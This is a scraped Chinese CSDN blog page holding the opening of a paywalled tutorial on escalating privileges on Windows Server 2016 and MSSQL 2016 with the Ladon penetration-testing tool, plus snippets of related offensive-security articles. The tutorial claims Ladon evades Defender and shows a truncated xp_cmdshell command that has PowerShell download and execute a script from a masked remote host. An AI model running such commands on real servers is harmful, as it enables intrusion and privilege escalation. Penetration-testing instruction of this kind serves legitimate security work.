〖教程〗Ladon提权Win2016/Win10/MSSQL2016

最新推荐文章于 2024-01-04 16:09:44 发布
最新推荐文章于 2024-01-04 16:09:44 发布
阅读量595 收藏
点赞数
分类专栏: 本地提权 Ladon
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/k8gege/article/details/118771235
版权

测试环境

Windows Server 2016
SQL: 13.0.1601.5
Microsoft Windows [Version 10.0.14393]

Ladon本地用户权限提权

网上找了些LPE,发现直接被Defender杀,病毒库更新至2021.1.19,Ladon没被杀,管理员UAC权限可通过BypassUac提权
image

MSSQL远程加载Ladon提权

执行SQL查询权限为network service

image

远程内存加载PowerLadon提权
exec master..xp_cmdshell 'powershell "IEX (New-Object Net.WebClient).DownloadString(''http://xxxxxx.800/Ladon.ps1''
最低0.47元/天 解锁文章
k8gege
关注
专栏目录
Windows提权
haoge1998的博客
04-25 4858
Windows提权 Windows基础知识 一、用户与用户组 在Windows中,不同用户有着不同的权限。主要权限包括有: 完全控制 修改 读取和执行 列出文件夹内容 读取 写入 1、内置用户 Administrator:系统管理员账号,拥有完全控制权 Guest:来宾账号,基本权限,默认时禁用 2、查看本地用户 net user 3、查看用户详细信息 net user darkid 用户也可以属于多个用户组,常见的用户组是 管理组(Administrators)、普通用户组(Users)、i
提权〗Ladon 8.0五种白名单方法BypaaUAC
K8哥哥
07-15 505
什么是UAC 根据MSDN中的文档,User Account Control(UAC)是在Windows Vista 以后版本中引入的一种安全机制,针对具有有限权限的账户. 通过 UAC,应用程序和任务可始终在非管理员帐户的安全上下文中运行,除非管理员特别授予管理员级别的系统访问权限。UAC 可以阻止未经授权的应用程序自动进行安装,并防止无意中更改系统设置。 BypassUAC方法 目前公开的绕过UAC的几种方式: 1.各类的UAC白名单程序的DLL劫持 2.各类自动提升权限的COM接口利用(Elevate
〖EXP〗Ladon打印机漏洞提权CVE-2021-1675复现
K8哥哥
07-11 2432
基本情况 6月9日,微软发布6月安全更新补丁,修复了50个安全漏洞,其中包括一个Windows Print Spooler权限提升漏洞,漏洞CVE编号:CVE-2021-1675。未经身份验证的远程攻击者可利用该漏洞以SYSTEM权限在域控制器上执行任意代码,从而获得整个域的控制权。建议受影响用户及时更新漏洞补丁进行防护,做好资产自查以及预防工作,以免遭受黑客攻击。 漏洞描述 Print Spooler是Windows系统中用于管理打印相关事务的服务。 该漏洞在域环境中合适的条件下,无需任何用户交互,未经身
windows 提权 CVE-2016-3225 CVE-2014-4113 CVE-2020-0787
qq_44905657的博客
01-07 3721
windows提权 1、搭建环境 我们先使用一个windows server 2012 R2,搭建IIS,弄一个建议网站,传个123.aspx大马 该大马可以执行文件、命令以及上传等操作,但是他有些目录是无法操作的,我们再上传一个6.asp扫描当前指定路径的可操作路径。 其中红色表示文件可替换,蓝色表示目录可写,我们选择一个C:\windows\Temp路径操作 2、各种提权 我们先使用windows server 2012比较常见的几种提权方式,CVE-2016-3225 (MS16-075) 当攻
Ladon8.9扫描器简明教程/用法例子
K8哥哥
05-31 8433
前言 本文仅是Ladon简单使用例子,Cobalt Strike或PowerShell版用法一致。 完整文档:http://k8gege.org/Ladon 资产扫描、指纹识别、服务识别、存活主机、端口扫描 001 多协议扫描存活主机(IP、机器名、MAC地址、制造商) Ladon 192.168.1.8/24 OnlinePC 002 多协议扫描存活主机(IP、机器名、操作系统版本、开放服务) Ladon 192.168.1.8/24 OsScan 003 扫描存活主机 Ladon 192.168.1.8
教程〗LadonGO免杀Win10 Defender
K8哥哥
08-03 1426
Wiki http://k8gege.org/Ladon/LadonGo.html 简介 LadonGo一款开源内网渗透扫描器框架,使用它可轻松一键探测C段、B段、A段存活主机、指纹识别、端口扫描、密码爆破、远程执行、高危漏洞检测等。3.8版本包含32个功能,高危漏洞检测MS17010、SmbGhost,远程执行SshCmd、WinrmCmd、PhpShell,12种协议密码爆破Smb/Ssh/Ftp/Mysql/Mssql/Oracle/Sqlplus/Winrm/HttpBasic/Redis/Mong
[教程]Windows下使用Ladon批量爆破SSH弱口令
K8哥哥
05-10 3704
前言 对于Linux操作系统来说,一般通过VNC、Teamviewer和SSH等工具来进行远程管理,SSH是 Secure Shell的缩写,由IETF的网络小组(Network Working Group)所制定;SSH 为建立在应用层基础上的安全协议。SSH 是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议。 利用SSH协议可以有效防止远程管理过程中的信息泄露问题。SSH客户端适用于多种平台,几乎所有UNIX平台—包括HP-UX、Linux、AIX、Solaris、Digital UNIX、
教程〗Ladon提权之Potato系列-windows全版本(IIS用户/服务用户)
K8哥哥
08-16 3041
Ladon提权之PipePotato/BadPotato/SweetPotato/PrintSpoofer 版本 >= Ladon 7.2.0 Update: 20200810 Potato提权原理 通过各种方法在本地NTLM中继获取SYSTEM令牌,再通过模拟令牌执行命令,通过以上方法提权统称为potato(不管是否基于原potato修改)。就像SQL注入,通过特定SQL语句注入获取特定数据库信息统称为SQL注入,而不管如何编写的SQL语句,是否基于别人的SQL语句修改。 提权条件 1 本地NTLM
教程〗Ladon提权MS16-135参数版(WIN7-2016)
K8哥哥
08-08 1281
漏洞名称 Win32k 特权提升漏洞(MS16-135)(CVE-2016-7255) 漏洞等级 高危 漏洞类型 本地提权 漏洞描述 如果 Windows 内核模式驱动程序无法正确处理内存中对象,则会存在多个特权提升漏洞。成功利用此漏洞的攻击者可以在内核模式下运行任意代码。攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。 攻击者必须先登录系统,然后才能利用这些漏洞。然后攻击者可以运行一个为利用这些漏洞而经特殊设计的应用程序,从而控制受影响的系统。该更新通过更正 Windows
windows提权漏洞
08-02
提权漏洞
Ladon:大型内网渗透扫描器和Cobalt Strike,Ladon7.2内置94个模块,包含信息收集主机端口扫描服务识别密码爆破突破检测漏洞利用。漏洞检测包含MS17010SMBGhostWeblogicActiveMQTomcatStruts2,密码爆破(MysqlOracleMSSQL)FTPSSH(Linux) VNCWindows(IPCWMISMBNetbiosLDAPSmbHashWmiHashWinrm),远程执行命令(wmiexepsexecatexecsshexecwebshel​​
02-05
Ladon 7.2 20200815 程序简介 Ladon一种用于大型网络渗透性的多线程插件化综合扫描神器,包括端口扫描,服务识别,网络资产,密码爆破,高危漏洞检测以及一键GetShell,支持批量A段/ B段/ C段以及跨7.2版本内置94个功能模块,外部模块18个,通过多种协议以及方法快速获取目标网络存活主机IP,计算机名,工作组,共享资源,网卡地址,操作系统版本,网站,子域名,中间件,开放服务,路由器,数据库等信息,漏洞检测包含MS17010,SMBGhost,Weblogic,ActiveMQ,Tomcat,Struts2系列等,密码爆破13种含数据库(Mysql,Oracle ,MS
Ladon插件-CVE-2020-1472域控提权漏洞EXP
K8哥哥
09-16 1295
漏洞简述 2020年08月12日, 360CERT监测发现Windows官方 发布了 NetLogon 特权提升漏洞 的风险通告,该漏洞编号为 CVE-2020-1472,漏洞等级:严重,漏洞评分:10分。 攻击者通过NetLogon(MS-NRPC),建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行经特殊设计的应用程序。 影响版本 Windows Server 2008 R2 for x64-based Systems Service Pac
Windows系统提权(一)
weixin_51151498的博客
08-15 598
提升权限
Windows提权_CS提权上线。
最新发布
weixin_39953838的博客
01-04 1518
许多过往之人事,可想可念不可急。
windows【提权系列】— CVE-2016-7255
qq_40907977的博客
05-10 2001
漏洞名称 Windows Win32k 权限提权漏洞 漏洞编号 CVE-2016-7255 MS16-135 漏洞描述 如果 Windows 内核模式驱动程序无法正确处理内存中对象,则会存在多个特权提升漏洞。成功利用此漏洞的攻击者可以在内核模式下运行任意代码。攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。 攻击者必须先登录系统,然后才能利用这些漏洞。然后攻击者可以运行一个为利用这些漏洞而经特殊设计的应用程序,从而控制受影响的系统。该更新通过更正 Windows 内核模式驱动程
权限提升-Windows本地提权-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC
xiaoheizi的博客
08-30 1461
进程迁移注入提权就是将获取到权限低的进程注入至进程中权限高的中,这样就实现了权限提升,同时注入进程提权相当于开启了一个后门, 隐蔽性极高,不会创建新的进程,很难发现。操作数据库的权限,数据库的增删改等,源码或配置文件泄漏,也可能是网站权限(webshell)进行的数据库配置文件读取获得。原理:把我的进程注入到一个现有的system账号运行的进程中,这样我的进程也就具有了system账号的权限了。程序路径:Potato/source/Potato/Potato/bin/Release/Potato.exe。
Windows提权
qq_52178795的博客
10-20 266
Windows提权手法
Ladon教程:快速掌握系统扫描与指纹识别
"这篇教程介绍了Ladon的基本使用方法,它是用于资产扫描、指纹识别、服务识别、存活主机检测和端口扫描等任务的工具。Ladon支持多协议扫描,例如ICMP、SMB,并能检测特定漏洞,如MS17-010和CVE-2020-0796。此外,它...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值